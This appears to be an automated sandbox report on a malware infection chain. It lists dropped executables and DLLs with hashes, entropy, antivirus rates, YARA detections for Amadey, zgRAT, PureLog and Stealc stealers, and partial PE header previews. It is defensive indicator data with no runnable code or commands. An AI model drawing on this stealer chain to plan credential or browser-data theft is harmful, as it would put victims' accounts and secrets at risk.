SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\Set-up[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6662059
Entropy (8bit):	6.630283296879029
Encrypted:	false
SSDEEP:	98304:YNMJ9r+xEJ3cLCB4Ty9Q0GhdjzK4KcNaUqE:RJ9r+x+iiyH7U4KcEPE
MD5:	06B767BF2A7DEAC9B9E524C5B6986BF7
SHA1:	8A0D79D7D04B89658394D72C4071A1F4037F32B2
SHA-256:	C4C861DDA94E9B3275D123E78D73BB9180B618855730EB2217A656D14E35A854
SHA-512:	0BA0E7D75355847BF9A124FD35A69F3F5281A351F730BD4BAB23AD3C5466A40FDA58871C77314557D42082C98A476B20FB68351DFBFB635CD6A958AB19765300
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..f.2_.E&.........#..G...Z...f...........H...@..................................~f....... ......................`..B....p..................................,$............................H......................q...............................text.....G.......G.................`.P`.data...H.....H.......G.............@.`..rdata...... H.......H.............@.`@/4............H.......H.............@.0@.bss....T.f..pL.......................`..edata..B....`.......TL.............@.0@.idata.......p.......VL.............@.0..CRT....4............`L.............@.0..tls.................bL.............@.0..reloc..,$.......&...dL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...:\.............@..B/55.....B.............\.............@..B/67.....T............l].............@.0B/80.....a.............].

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\channel3[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6641468
Entropy (8bit):	6.634863314519147
Encrypted:	false
SSDEEP:	49152:qVmOcOWin3OPJhJ2XcAJiiXD1D0VioUdZORT/MWzRllna64DGkZxvtSo6KLzYXR7:/OWQchArBD0VioUdZKLMyxnOGQ+6h9H+
MD5:	1F68ADC3E8D52FEF37E7E2DE22D0CD86
SHA1:	E52EFFC0915D0E3EA3CF9BD6565BB8163130613D
SHA-256:	C395613999C6F7D9E86A03F4259DD7F27C9E2964ED90D068F50F74F313918783
SHA-512:	B09DA4EF27B50303F996B977EEF735515B828E5F0283A40EA82CFAE1C57D15A6000ABF5E3E731F6169E007A25CAEF936DB037A43F69D59DEECB67DE957E046B1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.._..%.........#..G..fZ...f...........G...@.................................1.e....... ......................@..B....P.................................. ,...........................H......................Q...............................text...T.G.......G.................`.P`.data.........G.......G.............@.`..rdata........H.......G.............@.`@/4............H.......H.............@.0@.bss....T.f..PL.......................`..edata..B....@........L.............@.0@.idata.......P.......0L.............@.0..CRT....4....`.......:L.............@.0..tls.........p.......<L.............@.0..reloc.. ,...........>L.............@.0B/14..................lZ.............@..B/29.................tZ.............@..B/41.....XL...p...N....\.............@..B/55.....B............j\.............@..B/67.....T............N].............@.0B/80.....a............l].

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\crypteda[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1104936
Entropy (8bit):	7.998181628509962
Encrypted:	true
SSDEEP:	24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
MD5:	8E74497AFF3B9D2DDB7E7F819DFC69BA
SHA1:	1D18154C206083EAD2D30995CE2847CBEB6CDBC1
SHA-256:	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
SHA-512:	9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.\|.!. .0.^.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\1[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3639176
Entropy (8bit):	7.398157669285365
Encrypted:	false
SSDEEP:	98304:H+sv/t4BT7/Z/U6NVQFamv1oOgEoYYkTZ9:H+it4x7RcsmFxv+OgEoYvTZ9
MD5:	17D51083CCB2B20074B1DC2CAC5BEA36
SHA1:	0A046864AD4304F63DBDE5AC14D3DC05CFB48D46
SHA-256:	681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
SHA-512:	7DA8A2FD0321231C17FDDF414BF1D5A03D71DBC619F68958FF1D167003F972920F0F3C830B8A25AA715DF4FCC044D88D739B6EAB115A5B0B0A53852A70F4238A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................H....2......V.......`....@...........................7.......7..........@............................... ...P...v1..........f7..!......Dd..................................................................................CODE....`F.......H.................. ..`DATA....d....`.......L..............@...BSS.....Q............f...................idata... ......."...f..............@....tls.....................................rdata..............................@..P.reloc..Dd.......f..................@..P.rsrc....v1..P...v1.................@..P..............7......f7.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	423424
Entropy (8bit):	6.131000136533007
Encrypted:	false
SSDEEP:	6144:iEA/WL7JVwOzx3TPI/AnfFx7tbEO1jOTktBJ8WF7zu4P+fF4a6gqbDc:ih/WhVwOl3TI/mJdQYK+O2Fb
MD5:	05C1BAAA01BD0AA0CCB5EC1C43A7D853
SHA1:	E47D7F53987EB147F599321C858FE8D71EBC0D71
SHA-256:	9998D38B192309056D5109AC27A8B13F2B36FC27BAC9EBDF5385452B2C1B0CDB
SHA-512:	996450FC8C8B702327EACFE2EB819C86BACCF4D49F2EB58D3DD2B3CE35733F1E00857AC71B290BC99DB71BAAB08D7D7B22EF5223504C93B26ADE0DF6C9369501
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].D...............0..B...2.......a... ........@.. ....................................@.................................`a..K.................................................................................... ............... ..H............text....A... ...B.................. ..`.rsrc............0...D..............@..@.reloc...............t..............@..B.................a......H.......DZ..h...............................................................(....(.....0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~(...(.....%..G~(...(.....%..H~(...(.....%..e~(...(.....~)...(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~(...(....o........9......I~(...(.......8C........~(...(....o....:......{....~*...(....8......{....~+...(.........(...........9........o.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	322048
Entropy (8bit):	7.985128056067976
Encrypted:	false
SSDEEP:	6144:d/vtLE/OOyVWU4MaqmF5N5KtkuDuPH8AVZG0QMMRhgO+sPnxl:ddo/OOyFXptkusHZLGlRhV+sPnj
MD5:	6134586375C01F97F8777BAE1BF5ED98
SHA1:	4787FA996B75DBC54632CC321725EE62666868A1
SHA-256:	414BECB8AABD4E8C406E84DF062BEE1A45CFFA334AE30022078CFA71DA9E330D
SHA-512:	652ED16D96B5700F105C2BAB8E7258F167BC1615B6397BE7340C08DF7C977842844326E07FDEF677AECFAF07263F99BB7968C9FC926E90E5A33D2ED793F8436B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`..f................................. ........@.. .......................@......._....`.................................X...S............................ ...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......x...................................................................B...(..\|=C5H..........<6..2.......&...+.3..*....g^.c..F1..u....p.(C...:..(..S+..?.EV...\.K..........x...M.r..=62`.~B5=......rQ..-]@m...1wL6RH......T..Z.+.....\|....6....iP".g.....,..d.l....b....$?=s.jL...l.N.A.B......<<.Y.5...........s.T..<....]....M&R\|.......P.E:j....Q.N9r"...,....N.uT..Y..r.Y...........M.9...I..`.5............H........e..c..:[.d2{....{n9.9u....)b.S............b.1.9

C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1104936
Entropy (8bit):	7.998181628509962
Encrypted:	true
SSDEEP:	24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
MD5:	8E74497AFF3B9D2DDB7E7F819DFC69BA
SHA1:	1D18154C206083EAD2D30995CE2847CBEB6CDBC1
SHA-256:	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
SHA-512:	9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.\|.!. .0.^.

C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.395265378509869
Encrypted:	false
SSDEEP:	3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
MD5:	7A02AA17200AEAC25A375F290A4B4C95
SHA1:	7CC94CA64268A9A9451FB6B682BE42374AFC22FD
SHA-256:	836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
SHA-512:	F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6662059
Entropy (8bit):	6.630283296879029
Encrypted:	false
SSDEEP:	98304:YNMJ9r+xEJ3cLCB4Ty9Q0GhdjzK4KcNaUqE:RJ9r+x+iiyH7U4KcEPE
MD5:	06B767BF2A7DEAC9B9E524C5B6986BF7
SHA1:	8A0D79D7D04B89658394D72C4071A1F4037F32B2
SHA-256:	C4C861DDA94E9B3275D123E78D73BB9180B618855730EB2217A656D14E35A854
SHA-512:	0BA0E7D75355847BF9A124FD35A69F3F5281A351F730BD4BAB23AD3C5466A40FDA58871C77314557D42082C98A476B20FB68351DFBFB635CD6A958AB19765300
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..f.2_.E&.........#..G...Z...f...........H...@..................................~f....... ......................`..B....p..................................,$............................H......................q...............................text.....G.......G.................`.P`.data...H.....H.......G.............@.`..rdata...... H.......H.............@.`@/4............H.......H.............@.0@.bss....T.f..pL.......................`..edata..B....`.......TL.............@.0@.idata.......p.......VL.............@.0..CRT....4............`L.............@.0..tls.................bL.............@.0..reloc..,$.......&...dL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...:\.............@..B/55.....B.............\.............@..B/67.....T............l].............@.0B/80.....a.............].

C:\Users\user\AppData\Local\Temp\1000191001\1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3639176
Entropy (8bit):	7.398157669285365
Encrypted:	false
SSDEEP:	98304:H+sv/t4BT7/Z/U6NVQFamv1oOgEoYYkTZ9:H+it4x7RcsmFxv+OgEoYvTZ9
